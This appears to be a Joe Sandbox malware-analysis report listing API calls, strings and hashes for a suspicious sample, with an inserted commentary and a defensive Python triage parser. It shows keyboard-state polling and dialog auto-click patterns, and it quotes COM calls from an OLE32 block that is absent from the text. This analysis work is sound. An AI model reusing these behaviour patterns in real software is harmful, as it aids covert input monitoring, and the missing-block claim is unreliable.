                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                        • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                        • _wcscpy.LIBCMT ref: 004787E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                        • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 3052893215-2127371420
                                                        • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                        • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                        • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                        • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                        APIs
                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                        • __swprintf.LIBCMT ref: 0045E7F7
                                                        • _wprintf.LIBCMT ref: 0045E8B3
                                                        • _wprintf.LIBCMT ref: 0045E8D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2295938435-2354261254
                                                        • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                        • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                        • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                        • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __swprintf_wcscpy$__i64tow__itow
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 3038501623-2263619337
                                                        • Opcode ID: a6bd10806f41b47618e3f392f0a5aa3dfe1501e9ab456f7e77e9f1dfd82c9d8d
                                                        • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                        • Opcode Fuzzy Hash: a6bd10806f41b47618e3f392f0a5aa3dfe1501e9ab456f7e77e9f1dfd82c9d8d
                                                        • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                        APIs
                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                        • __swprintf.LIBCMT ref: 0045E5F6
                                                        • _wprintf.LIBCMT ref: 0045E6A3
                                                        • _wprintf.LIBCMT ref: 0045E6C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2295938435-8599901
                                                        • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                        • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                        • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                        • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00443B67
                                                          • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                        • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                        • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                        • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                        • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                        • IsWindow.USER32(00000000), ref: 00443C3A
                                                        • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                        • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1834419854-3405671355
                                                        • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                        • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                        • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                        • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                        • LoadStringW.USER32(00000000), ref: 00454040
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • _wprintf.LIBCMT ref: 00454074
                                                        • __swprintf.LIBCMT ref: 004540A3
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 455036304-4153970271
                                                        • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                        • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                        • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                        • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                        APIs
                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                        • _memmove.LIBCMT ref: 00467EB8
                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                        • _memmove.LIBCMT ref: 00467F6C
                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                        • String ID:
                                                        • API String ID: 2170234536-0
                                                        • Opcode ID: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                                                        • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                        • Opcode Fuzzy Hash: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                                                        • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00453CE0
                                                        • SetKeyboardState.USER32(?), ref: 00453D3B
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                        • GetKeyState.USER32(000000A0), ref: 00453D75
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                        • GetKeyState.USER32(00000011), ref: 00453DEF
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                        • GetKeyState.USER32(00000012), ref: 00453E26
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                        • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                        • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                        • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
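The two listings above read more easily once the immediates are decoded with the Windows SDK names: in the keyboard-state function, 0xA0 and 0xA1 are VK_LSHIFT and VK_RSHIFT, 0x11 is VK_CONTROL, 0x12 is VK_MENU (Alt) and 0x5B is VK_LWIN, so the function is polling the modifier keys; in the window function, FindWindowExW is given the class name BUTTON, SendMessageW is sent 0xF5 (BM_CLICK) and then 0x10 (WM_CLOSE), and the subcall attaches to the target window's thread with AttachThreadInput, which is the usual pattern for programmatically pressing a button on a dialog and closing it. The following is an added example, not part of the Joe Sandbox report or of the sample being analysed: a small Python parser for this "Name.MODULE(args), ref: ADDR" listing format, with a few triage heuristics run over the parsed calls. The embedded input lines are copied verbatim from the listings on this page (the COM lines from the OLE32 block later in the listing). The tag names (keystate-polling, dialog-automation, input-queue-attach, com-security-setup) and the heuristics behind them are my own assumptions, not Joe Sandbox signatures.

```python
import re
from typing import Dict, List, Optional

# Input constructed from the APIs listings in this report (verbatim lines).
KEYBOARD_BLOCK = """\
• GetKeyboardState.USER32(?), ref: 00453CE0
• SetKeyboardState.USER32(?), ref: 00453D3B
• GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
• GetKeyState.USER32(000000A0), ref: 00453D75
• GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
• GetAsyncKeyState.USER32(00000011), ref: 00453DE1
• GetAsyncKeyState.USER32(00000012), ref: 00453E18
• GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
"""

WINDOW_BLOCK = """\
• timeGetTime.WINMM ref: 00443B67
  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
• Sleep.KERNEL32(0000000A), ref: 00443B9F
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
• SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
"""

COM_BLOCK = """\
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
• CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
"""

# "• [Part of subcall function XXXXXXXX: ]Name.MODULE[(args)][,] ref: ADDR"
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[\w:@]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)
_HEX = re.compile(r"^(-?)([0-9A-F]{8})$")

# Windows SDK constants for the immediates seen in the listings above.
VK_NAMES = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL",
            0x12: "VK_MENU", 0x5B: "VK_LWIN"}
BM_CLICK = 0xF5   # button control message: simulate a click
WM_CLOSE = 0x10


def _arg(tok: str):
    """8-digit hex immediates become ints (sign kept); '?' and strings stay text."""
    m = _HEX.match(tok)
    if not m:
        return tok
    value = int(m.group(2), 16)
    return -value if m.group(1) else value


def parse_api_line(line: str) -> Optional[Dict]:
    """Parse one listing line; returns None for headers and non-API lines."""
    m = _LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [_arg(t.strip()) for t in raw.split(",")] if raw else []
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args, "ref": m.group("ref"), "caller": m.group("caller")}


def parse_block(text: str) -> List[Dict]:
    return [r for r in (parse_api_line(ln) for ln in text.splitlines()) if r]


def polled_keys(calls: List[Dict]) -> List[str]:
    """Virtual-key names a block polls through GetKeyState/GetAsyncKeyState."""
    keys = set()
    for c in calls:
        if c["name"] in ("GetAsyncKeyState", "GetKeyState") and c["args"]:
            vk = c["args"][0]
            if isinstance(vk, int):
                keys.add(VK_NAMES.get(vk, f"VK_{vk:02X}"))
    return sorted(keys)


def classify(calls: List[Dict]) -> List[str]:
    """Coarse triage tags (assumed names) from the API mix; not a verdict."""
    tags = set()
    names = {c["name"] for c in calls}
    if polled_keys(calls):
        tags.add("keystate-polling")
    clicks = any(c["name"] == "SendMessageW" and len(c["args"]) > 1
                 and c["args"][1] in (BM_CLICK, WM_CLOSE) for c in calls)
    if "FindWindowExW" in names and clicks:
        tags.add("dialog-automation")    # locate a control, then click/close it
    if "AttachThreadInput" in names:
        tags.add("input-queue-attach")   # join another thread's input queue
    if {"CoInitializeSecurity", "CoSetProxyBlanket"} <= names:
        tags.add("com-security-setup")   # explicit DCOM authn/impersonation levels
    return sorted(tags)


if __name__ == "__main__":
    for label, block in (("keyboard", KEYBOARD_BLOCK), ("window", WINDOW_BLOCK),
                         ("com", COM_BLOCK)):
        calls = parse_block(block)
        print(label, len(calls), "calls", classify(calls), polled_keys(calls))
```

Calls marked "Part of subcall function" keep the caller address in the record, so a heuristic can choose whether to count behaviour that only happens in a callee; the example above counts it, which is why the window block is tagged with input-queue-attach even though AttachThreadInput is called from 004439C1 rather than from the listed function.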
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                        • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                        • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                        • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                        • DeleteObject.GDI32(?), ref: 0047151E
                                                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                        • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                        • DeleteObject.GDI32(?), ref: 004715EA
                                                        • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                        • String ID:
                                                        • API String ID: 3218148540-0
                                                        • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                        • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                        • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                        • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
